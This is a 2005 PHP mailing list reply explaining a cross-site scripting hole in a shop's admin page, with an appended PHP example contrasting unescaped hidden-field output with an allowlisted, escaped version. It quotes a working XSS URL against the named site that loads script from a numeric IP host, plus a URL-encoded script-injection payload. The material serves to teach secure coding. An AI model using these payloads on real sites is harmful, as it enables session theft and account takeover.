On Saturday 28 May 2005 01:05, Chris W. Parker wrote:
> Rasmus Lerdorf <mailto:rasmus@xxxxxxxxxxx>
> on Friday, May 27, 2005 11:58 AM said:
>
> >>> You have all sorts of problems at that URL. To start with, here is
> >>> a cross-site scripting hack:
> >>>
> >>> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09src%3D%22http://3423329163/v
>
> First of all, excellent example.
>
> > Don't display arbitrary key names in hidden fields the way you are.
>
> What do you mean by "arbitrary key names"?

In this example, what was going on was that I captured the parameters passed on the URL and included them as hiddens in a form. Since it was not properly escaped, the attack succeeds by inserting a variable with value

"><script type="text/javascript" src="somewhere"></script>

but then URL-encoded:

%22%3E+%3Cscript+type%3D%09ext%2Fjavascript+src%3D%22somewhere%22%3E%3C%2Fscript%3E

which translates in the HTML document to:

<form...>
<input type="hidden" name=""><script type="text/javascript" src="somewhere"></script>
...

--
Registered Linux User Number 379093
--
Check out these few php utilities that I released under the GPL2 and that are meant for use with a php cli binary:
http://www.vlaamse-kern.com/sas/
--
PHP General Mailing List (http://www.php.net/)
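The pattern the reply describes, shown as an added example that is not code from this thread or from the yourstore project: the request parameters are copied into hidden inputs with the parameter *name* interpolated raw, so a name containing `">` closes the attribute and the tag and the rest becomes live markup. The hardened version beside it addresses both points raised above: it only emits keys from an allowlist (so arbitrary key names never reach the page) and it HTML-escapes name and value with `htmlspecialchars(..., ENT_QUOTES, 'UTF-8')`. The `$request` array, the `hiddenFieldsUnsafe`/`hiddenFieldsSafe` names and the allowlist are constructed for this example; the script payload uses the same `src="somewhere"` placeholder as the message.

```php
<?php
// Added example, not from the thread or the yourstore project.
// Constructed stand-in for $_GET as it would look after the URL-encoded
// request quoted in the message: the attacker-controlled string is the
// parameter NAME (with an empty value), alongside a legitimate parameter.
$request = [
    '"><script type="text/javascript" src="somewhere"></script>' => '',
    'page' => '2',
];

// Vulnerable pattern: carry every parameter through as a hidden field.
function hiddenFieldsUnsafe(array $params): string {
    $html = '';
    foreach ($params as $name => $value) {
        // Raw interpolation: a double quote in $name terminates the name
        // attribute, '>' closes the <input>, and the remainder is parsed as
        // markup. This reproduces the broken <input> shown in the message.
        $html .= "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
    }
    return $html;
}

// Hardened pattern: iterate over the keys the form is expected to carry
// (never over whatever the client sent), and escape both name and value.
// ENT_QUOTES covers single and double quotes, so neither can break out of
// the attribute; the charset argument prevents encoding-based bypasses.
function hiddenFieldsSafe(array $params, array $allowedKeys): string {
    $html = '';
    foreach ($allowedKeys as $name) {
        if (!array_key_exists($name, $params)) {
            continue;           // parameter not present in this request
        }
        // Only scalar values belong in an attribute; arrays (foo[]=) are dropped.
        $value = is_scalar($params[$name]) ? (string) $params[$name] : '';
        $html .= sprintf(
            "<input type=\"hidden\" name=\"%s\" value=\"%s\">\n",
            htmlspecialchars($name, ENT_QUOTES, 'UTF-8'),
            htmlspecialchars($value, ENT_QUOTES, 'UTF-8')
        );
    }
    return $html;
}

echo "--- unsafe: attacker key becomes markup ---\n";
echo hiddenFieldsUnsafe($request);

echo "--- safe: only allowlisted, escaped fields are emitted ---\n";
echo hiddenFieldsSafe($request, ['page', 'sort']);
```

Running it prints the same broken `<input type="hidden" name=""><script ...></script>` line the message shows for the unsafe version, while the safe version emits only `<input type="hidden" name="page" value="2">`. Escaping alone would already neutralise the quote (it becomes `&quot;`), but the allowlist is what actually answers the "arbitrary key names" objection: the form should know which fields it carries, and anything else in the query string has no business being reflected at all.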